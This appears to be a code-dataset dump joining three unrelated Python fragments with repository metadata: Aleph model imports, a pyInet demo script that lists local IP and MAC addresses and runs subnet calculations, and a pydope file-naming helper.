from sqlalchemy import func
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.orm.attributes import flag_modified
from aleph.core import db
from aleph.model.metadata import Metadata
from aleph.model.validate import validate
from aleph.model.collection import Collection
from aleph.model.reference import Reference
from aleph.model.common import DatedModel
from aleph.model.document_record import DocumentRecord
from aleph.model.document_tag import DocumentTag
from aleph.text import index_form
log = logging.getLogger(__name__)
| 35.366972 | 113 | 0.623476 |
b1d1d0561cf49238a4a8252a8f7aae4e72eed16d | 1,613 | py | Python | pyInet/__main__.py | LcfherShell/pynet | 80284d7147d7b8d69c631fd6fe1236bb73e50b1b | [
"MIT"
] | null | null | null | pyInet/__main__.py | LcfherShell/pynet | 80284d7147d7b8d69c631fd6fe1236bb73e50b1b | [
"MIT"
] | null | null | null | pyInet/__main__.py | LcfherShell/pynet | 80284d7147d7b8d69c631fd6fe1236bb73e50b1b | [
"MIT"
] | null | null | null | try:
from main import ClassA, ClassB
except:
try:
from pyInet import ClassA, ClassB
except:
from pyInet.main import ClassA, ClassB
if __name__ == "__main__":
child = ClassA #Public Class
network = ClassB #Private Class
print("Call function using public class")
for i in range(3):
for ipv4 in child.IPv4(i):
print("IPv4:", ipv4)
for ipv6 in child.IPv6(i):
print("IPv6:", ipv6)
print("MacAddresss:", child.MacAddresss(),"\n")
i = 0
print("\nCall function using private class")
for i in range(3):
for ipv4 in network.IPv4(i):
print("IPv4:", ipv4)
for ipv6 in network.IPv6(i):
print("IPv6:", ipv6)
print("MacAddresss:", network.MacAddresss(),"\n")
ipv4 = "192.230.212.159"
ipv6 = "f18d:5980:50d1:cf2d:b204:dc2:ad87:6a58"
print("Check Version and Class Ip addresses")
print("IP version:", child.Validate_IP(ipv4))
print("IPv4 Class:", child.IPv4_Class(ipv4))
print("\nIP version:", child.Validate_IP(ipv6))
print("IPv6 Class:", child.IPv6_Class(ipv6))
print("\nManipulate IPv4 :")
for x in range(1, 33):
child.IPv4_Calculator("{}/{}".format(ipv4, x))
print(child.saving.output)
print("\nManipulate IPv6 :")
for y in range(0, 33):
ipv6range = "{}/{}".format(ipv6, y)
child.IPv6_Calculator(ipv6range)
print(child.saving.output)
| 33.604167 | 62 | 0.543707 |
b1d42f3d03c0a3e27b14e56be2c1099412ba4e94 | 3,854 | py | Python | dope/filespec/__init__.py | gwappa/pydope | c8beb315177a850e9d275902a6303e68a319c123 | [
"MIT"
] | null | null | null | dope/filespec/__init__.py | gwappa/pydope | c8beb315177a850e9d275902a6303e68a319c123 | [
"MIT"
] | 5 | 2020-05-13T13:09:45.000Z | 2020-05-14T14:18:43.000Z | dope/filespec/__init__.py | gwappa/pydope | c8beb315177a850e9d275902a6303e68a319c123 | [
"MIT"
] | null | null | null | #
# MIT License
#
# Copyright (c) 2020 Keisuke Sehara
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import collections as _collections
from ..core import SelectionStatus as _SelectionStatus
def compute_path(self, context):
"""context: Predicate"""
return context.compute_domain_path() / self.format_name(context)
def format_name(self, context, digits=None):
"""context: Predicate"""
runtxt = self.format_run(digits=digits)
chtxt = self.format_channel(context)
sxtxt = self.format_suffix()
return f"{context.subject}_{context.session.name}_{context.domain}{runtxt}{chtxt}{sxtxt}"
| 37.417476 | 102 | 0.639855 |